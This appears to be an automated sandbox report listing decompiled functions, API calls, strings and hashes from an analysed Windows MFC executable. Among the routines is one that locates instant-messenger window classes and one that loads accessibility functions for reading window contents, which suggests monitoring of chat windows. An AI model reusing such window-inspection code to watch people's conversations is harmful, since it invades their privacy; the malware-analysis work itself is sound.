Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: CreateFilelstrcat$#2379#800#924CloseH_prologModuleNameValuelstrcpylstrlenstrrchr
String ID: X%D$pk.bin
API String ID: 965265263-3879839953
Opcode ID: 2c98776a39eca5e1f208e1ddad5c1be96afb28e522347b7f0caeee4f5b0517e4
Instruction ID: 5c98c6a0e8a1ab7bd0c1ef8652de08ce64479763ce929b8e68fc415fc9871944
Opcode Fuzzy Hash: 2c98776a39eca5e1f208e1ddad5c1be96afb28e522347b7f0caeee4f5b0517e4
Instruction Fuzzy Hash: 37F04631506710BADB29EB65E4067CEBBB0DF09318F50881FB015560D1CBBC6588CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A106, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A106(struct HWND__* _a4, char* _a8) {

				if(_a4 != 0) {
					if(strncmp(_a8, "IMWindowClass", 0xd) == 0 || strncmp(_a8, "PageWindowClass", 0xd) == 0) {
						return FindWindowExA(_a4, 0, "DirectUIHWND", 0) & 0xffffff00 | _t8 != 0x00000000;
					} else {
						goto L1;
					}
				}
				L1:
				return 0;
			}

0x0040a10c
0x0040a12a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a12a
0x0040a10e
0x00000000

APIs

strncmp.MSVCRT(?,IMWindowClass,0000000D), ref: 0040A123
strncmp.MSVCRT(?,PageWindowClass,0000000D), ref: 0040A137
FindWindowExA.USER32 ref: 0040A14D

Strings

DirectUIHWND, xrefs: 0040A142
IMWindowClass, xrefs: 0040A11A
PageWindowClass, xrefs: 0040A12E

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: strncmp$FindWindow
String ID: DirectUIHWND$IMWindowClass$PageWindowClass
API String ID: 3956805227-2290508562
Opcode ID: 81cead9e737d4d8aa051ba9c657d8d9cc6858aa714670e4b1493a57e648b913c
Instruction ID: 55062af96aa20b879a9a34928b64882c37cb08a6226f325d26903f5f5e579126
Opcode Fuzzy Hash: 81cead9e737d4d8aa051ba9c657d8d9cc6858aa714670e4b1493a57e648b913c
Instruction Fuzzy Hash: 60E0E530280311B3E6218F20AD03F4B73805F51B03F110437BD40751D1E2799D28A66F

Uniqueness

Uniqueness Score: -1.00%

Function 0041A04C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 28
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A04C(void* __ecx) {
				void* __esi;
				void* _t8;
				struct HWND__* _t11;
				long _t12;
				void* _t18;
				void* _t20;
				intOrPtr _t22;

				_t8 = E0043E4E0(0x4412f0, _t20);
				_push(__ecx);
				_t18 = __ecx;
				_push(__ecx);
				 *((intOrPtr*)(_t20 - 0x10)) = _t22;
				_push("options_title.htm");
				L0043DE26();
				 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
				L004044C9(_t8, _t22, __ecx);
				E00422E3C();
				_t11 = GetParent( *(_t18 + 0x20));
				_push(_t11);
				L0043DD9C();
				_t12 = SendMessageA( *(_t11 + 0x20), 0x53, 0, 0);
				 *[fs:0x0] =  *((intOrPtr*)(_t20 - 0xc));
				return _t12;
			}

0x0041a051
0x0041a056
0x0041a058
0x0041a05a
0x0041a05d
0x0041a060
0x0041a065
0x0041a06a
0x0041a06e
0x0041a075
0x0041a07d
0x0041a083
0x0041a084
0x0041a092
0x0041a09c
0x0041a0a4

APIs

__EH_prolog.LIBCMT ref: 0041A051
#537.MFC42(options_title.htm,?,?,?,0041A046), ref: 0041A065

Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB

GetParent.USER32(?), ref: 0041A07D
#2864.MFC42(00000000,?,?,?,0041A046), ref: 0041A084
SendMessageA.USER32(?,00000053,00000000,00000000), ref: 0041A092

Strings

options_title.htm, xrefs: 0041A060

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#922H_prolog$#2864#924DesktopMessageParentSendWindow
String ID: options_title.htm
API String ID: 1701201414-3760961916
Opcode ID: 1c34da9d795b849c3d96e9a41e03bad92471dcf3ab88354f1fc759181fa90849
Instruction ID: 62607f949bef3c38a102216fa6dddf96d4c28192d0749a8f70c8b7ba80dfaedf
Opcode Fuzzy Hash: 1c34da9d795b849c3d96e9a41e03bad92471dcf3ab88354f1fc759181fa90849
Instruction Fuzzy Hash: F9F0E5B1A10200BBCB143BB5EC07B6E7B74FB89718F00476FB122B61E2CBB859005A1C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC3F, Relevance: 10.5, APIs: 7, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040EC3F(void* __eax, void* __ecx) {

				_push(0x421);
				L0043DFA6();
				_push(__eax);
				_push(0x479);
				L0043E066();
				L0043E07E();
				_push(__eax);
				_push(0x3e8);
				L0043E066();
				L0043E07E();
				_push(__eax);
				_push(0x3e9);
				L0043E066();
				L0043E07E();
				return __eax;
			}

0x0040ec43
0x0040ec48
0x0040ec51
0x0040ec52
0x0040ec57
0x0040ec5e
0x0040ec63
0x0040ec64
0x0040ec6b
0x0040ec72
0x0040ec77
0x0040ec78
0x0040ec7f
0x0040ec86
0x0040ec8d

APIs

#4055.MFC42(00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?,00000421,?,?,00EFEFEF,00010101,00808080), ref: 0040EC48
#3092.MFC42(00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?,00000421,?,?,00EFEFEF), ref: 0040EC57
#2642.MFC42(00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?,00000421,?,?,00EFEFEF), ref: 0040EC5E
#3092.MFC42(000003E8,00000000,00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?,00000421,?), ref: 0040EC6B
#2642.MFC42(000003E8,00000000,00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?,00000421,?), ref: 0040EC72
#3092.MFC42(000003E9,00000000,000003E8,00000000,00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?), ref: 0040EC7F
#2642.MFC42(000003E9,00000000,000003E8,00000000,00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?), ref: 0040EC86

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2642#3092$#4055
String ID:
API String ID: 2023933615-0
Opcode ID: 4cc7e614508e5a90b9d3356f2a59a892ba123c0ed536a0695441edaf4867cb30
Instruction ID: 3957810a96fb800fa570e150547e83f9b838ce8289a0f2f271505939ccb6f5d9
Opcode Fuzzy Hash: 4cc7e614508e5a90b9d3356f2a59a892ba123c0ed536a0695441edaf4867cb30
Instruction Fuzzy Hash: D7E0BF1174227467A93D32B7691BE1E046ACBC9F14F00141F71059B2C2ECDC4D024269

Uniqueness

Uniqueness Score: -1.00%

Function 00409F9B, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 21
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00409F9B(intOrPtr* __ecx) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t12;
				void* _t13;

				_t12 = __ecx;
				E00409DB9(__ecx, _t13);
				 *__ecx = 0x44620c;
				_t6 = LoadLibraryA("oleacc.dll");
				 *(_t12 + 8) = _t6;
				 *((intOrPtr*)(_t12 + 0xc)) = GetProcAddress(_t6, "AccessibleChildren");
				 *((intOrPtr*)(_t12 + 0x10)) = GetProcAddress( *(_t12 + 8), "AccessibleObjectFromWindow");
				return _t12;
			}

0x00409f9d
0x00409f9f
0x00409fa9
0x00409faf
0x00409fc1
0x00409fcb
0x00409fd3
0x00409fda

APIs

Part of subcall function 00409DB9: __EH_prolog.LIBCMT ref: 00409DBE
Part of subcall function 00409DB9: #540.MFC42(?,?,?,00409DA4,?,0040FC41,?,00000000), ref: 00409DD5
Part of subcall function 00409DB9: #860.MFC42(RichEdit20A,?,?,?,00409DA4,?,0040FC41,?,00000000), ref: 00409DFB

LoadLibraryA.KERNEL32(oleacc.dll,?,?,00409F86,?,0040FC60,?,00000000), ref: 00409FAF
GetProcAddress.KERNEL32(00000000,AccessibleChildren), ref: 00409FC4
GetProcAddress.KERNEL32(?,AccessibleObjectFromWindow), ref: 00409FD1

Strings

AccessibleChildren, xrefs: 00409FBB
oleacc.dll, xrefs: 00409FA4
AccessibleObjectFromWindow, xrefs: 00409FC6

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: AddressProc$#540#860H_prologLibraryLoad
String ID: AccessibleChildren$AccessibleObjectFromWindow$oleacc.dll
API String ID: 327254565-1902197158
Opcode ID: cbeee3fc07a31d6ed5a9ef00c9a732ce3a53231801f028108b712cd7d3655a03
Instruction ID: b537656310bf855d8e7be808281da66fe88c8355c092a742d0a524adf848670f
Opcode Fuzzy Hash: cbeee3fc07a31d6ed5a9ef00c9a732ce3a53231801f028108b712cd7d3655a03
Instruction Fuzzy Hash: C0E04FB5600300AFC3206F2AAC06906BBE4EE91752311483FE555D3222D7B8D9448F98

Uniqueness

Uniqueness Score: -1.00%

Function 0041B92B, Relevance: 9.1, APIs: 6, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0041B92B(void* __ecx) {
				char _v8;
				signed int _t23;
				char* _t25;

				_push(__ecx);
				_push(0x100);
				_push( *((intOrPtr*)(__ecx + 0x60)) + 0x369);
				_push(0x469);
				L0043E078();
				_push(0x80);
				_push( *((intOrPtr*)(__ecx + 0x60)) + 0x469);
				_push(0x433);
				L0043E078();
				_push(0x80);
				_push( *((intOrPtr*)(__ecx + 0x60)) + 0x4e9);
				_push(0x434);
				L0043E078();
				_push(0x100);
				_t23 =  *((intOrPtr*)(__ecx + 0x60)) + 0x569;
				_push(_t23);
				_push(0x435);
				L0043E078();
				_push(0x421);
				L0043DFA6();
				_push(0);
				 *((char*)( *((intOrPtr*)(__ecx + 0x60)) + 0x368)) = _t23 & 0xffffff00 | _t23 != 0x00000000;
				_t25 =  &_v8;
				_push(_t25);
				_push(0x46a);
				_v8 = 1;
				L0043E2DC();
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x60)) + 0x106c)) = _t25;
				if(_v8 == 0) {
					_t25 =  *((intOrPtr*)(__ecx + 0x60));
					 *((intOrPtr*)(_t25 + 0x106c)) = 0x15;
				}
				return _t25;
			}

0x0041b92e
0x0041b934
0x0041b946
0x0041b947
0x0041b948
0x0041b957
0x0041b958
0x0041b959
0x0041b960
0x0041b968
0x0041b970
0x0041b971
0x0041b976
0x0041b97e
0x0041b983
0x0041b98a
0x0041b98b
0x0041b990
0x0041b995
0x0041b99c
0x0041b9a4
0x0041b9ab
0x0041b9b1
0x0041b9b4
0x0041b9b5
0x0041b9bc
0x0041b9c3
0x0041b9cb
0x0041b9d5
0x0041b9d7
0x0041b9da
0x0041b9da
0x0041b9e8

APIs

#3098.MFC42(00000469,?,00000100), ref: 0041B948
#3098.MFC42(00000433,?,00000080,00000469,?,00000100), ref: 0041B960
#3098.MFC42(00000434,?,00000080,00000433,?,00000080,00000469,?,00000100), ref: 0041B976
#3098.MFC42(00000435,?,00000100,00000434,?,00000080,00000433,?,00000080,00000469,?,00000100), ref: 0041B990
#4055.MFC42(00000421,00000435,?,00000100,00000434,?,00000080,00000433,?,00000080,00000469,?,00000100), ref: 0041B99C
#3095.MFC42(0000046A,?,00000000,00000421,00000435,?,00000100,00000434,?,00000080,00000433,?,00000080,00000469,?,00000100), ref: 0041B9C3

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3098$#3095#4055
String ID:
API String ID: 1985669295-0
Opcode ID: e0adc5cb59c369d3724ca548386552f2a66282b777f3f81afd3673d26348af64
Instruction ID: ee9ad6be540e487d0e4d593e5d69f5e544ce2a33cda72f30bcafd18c18b240c8
Opcode Fuzzy Hash: e0adc5cb59c369d3724ca548386552f2a66282b777f3f81afd3673d26348af64
Instruction Fuzzy Hash: D61191B1300714AFF3149A67CC46FEB72ACEB89B08F04002EB6818B3C1D6E5AD05C764

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF08, Relevance: 9.1, APIs: 6, Instructions: 55
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041BF08(void* __ecx, void* __eflags) {
				void* _t31;
				void* _t33;
				void* _t48;
				void* _t53;

				E0043E4E0(0x4415bb, _t53);
				_t48 = __ecx;
				E00419DC7(_t53 - 0x1f0, 0);
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				_push( *((intOrPtr*)(__ecx + 0x60)) + 0x2d4);
				L0043DDD2();
				asm("sbb eax, eax");
				_t31 = E00429029(_t53 - 0x10,  ~( *( *((intOrPtr*)(_t53 - 0x18c)) - 8)) + 0xe071);
				_push(_t31);
				 *(_t53 - 4) = 1;
				L0043DFCA();
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				L0043DD36();
				L0043DE7A();
				if(_t31 == 1) {
					lstrcpynA( *((intOrPtr*)(_t48 + 0x60)) + 0x2d4,  *(_t53 - 0x118), 0x80);
				}
				 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
				L0040663D(_t53 - 0x1f0,  *(_t53 - 4));
				_t33 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t33;
			}

0x0041bf0d
0x0041bf1a
0x0041bf24
0x0041bf2c
0x0041bf3d
0x0041bf3e
0x0041bf4e
0x0041bf5a
0x0041bf61
0x0041bf68
0x0041bf6c
0x0041bf71
0x0041bf78
0x0041bf83
0x0041bf8b
0x0041bf9e
0x0041bf9e
0x0041bfa4
0x0041bfae
0x0041bfb8
0x0041bfbb
0x0041bfc3

APIs

__EH_prolog.LIBCMT ref: 0041BF0D

Part of subcall function 00419DC7: __EH_prolog.LIBCMT ref: 00419DCC
Part of subcall function 00419DC7: #324.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DE2
Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DEE
Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419DFA
Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E17
Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E26
Part of subcall function 00419DC7: #540.MFC42(000000A9,?,?,?,?,?,00419C38,00000000), ref: 00419E35
Part of subcall function 00419DC7: #860.MFC42(004550CC,?,?,?,?,00419C38,00000000), ref: 00419E79
Part of subcall function 00419DC7: #860.MFC42(004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E85
Part of subcall function 00419DC7: #860.MFC42(004550CC,004550CC,004550CC,?,?,?,?,00419C38,00000000), ref: 00419E91

#860.MFC42(?,00000000), ref: 0041BF3E

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#858.MFC42(00000000,?,00000000), ref: 0041BF6C
#800.MFC42(00000000,?,00000000), ref: 0041BF78
#2514.MFC42(00000000,?,00000000), ref: 0041BF83
lstrcpynA.KERNEL32(?,?,00000080,00000000,?,00000000), ref: 0041BF9E

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540$#860$H_prolog$#1168#2514#324#537#800#858LoadStringlstrcpyn
String ID:
API String ID: 2272019338-0
Opcode ID: 1cd5cd69a124368ebf00bc965c59acd5a78c584da7bf2d89405eddda1ad1d14e
Instruction ID: 45a4ca4260a82fc295c410adc38a17f00edc715a730f85d62a835649675cfd28
Opcode Fuzzy Hash: 1cd5cd69a124368ebf00bc965c59acd5a78c584da7bf2d89405eddda1ad1d14e
Instruction Fuzzy Hash: 1B119D32E10129ABDB24EB65DC56BEDB774BF14318F0045AAE015A31C1DB78AE88CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D13C, Relevance: 9.1, APIs: 6, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040D13C(void* __ecx) {
				intOrPtr _t16;
				void* _t18;
				intOrPtr* _t33;
				void* _t35;
				void* _t37;

				_t16 = E0043E4E0(0x43fe44, _t37);
				_push(__ecx);
				_t35 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
					L8:
					 *[fs:0x0] =  *((intOrPtr*)(_t37 - 0xc));
					return _t16;
				}
				if( *((intOrPtr*)(__ecx + 0xc4)) == 0) {
					_t18 = E0040D10A(__ecx + 0xdc, _t37 - 0x10);
					_t33 = _t35 + 0x50;
					_push(_t18);
					 *(_t37 - 4) = 0;
					L0043DFCA();
					 *(_t37 - 4) =  *(_t37 - 4) | 0xffffffff;
					L0043DD36();
					_t16 =  *_t33;
					if( *((intOrPtr*)(_t16 - 8)) == 0 &&  *((intOrPtr*)(_t35 + 0x10c)) != 0) {
						_t16 = E0040CC69(_t16, _t35);
						if(_t16 == 0) {
							L0043DE32();
						} else {
							_push(_t33);
							L0043E19E();
						}
					}
				}
				_push(1);
				_push(_t35);
				_push( *((intOrPtr*)(_t35 + 0x50)));
				L0043E1A4();
				goto L8;
			}

0x0040d141
0x0040d146
0x0040d149
0x0040d150
0x0040d1bf
0x0040d1c4
0x0040d1cc
0x0040d1cc
0x0040d159
0x0040d165
0x0040d16a
0x0040d16d
0x0040d170
0x0040d173
0x0040d178
0x0040d17f
0x0040d184
0x0040d189
0x0040d196
0x0040d19d
0x0040d1ab
0x0040d19f
0x0040d19f
0x0040d1a2
0x0040d1a2
0x0040d19d
0x0040d189
0x0040d1b0
0x0040d1b2
0x0040d1b3
0x0040d1b9
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0040D141
#6358.MFC42(?,?,00000001), ref: 0040D1B9

Part of subcall function 0040D10A: #535.MFC42 ref: 0040D119

#858.MFC42(00000000), ref: 0040D173
#800.MFC42(00000000), ref: 0040D17F

Part of subcall function 0040CC69: #3797.MFC42(0040C750), ref: 0040CC6D

#3874.MFC42(?,?,00000000), ref: 0040D1A2
#2614.MFC42(?,00000000), ref: 0040D1AB

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
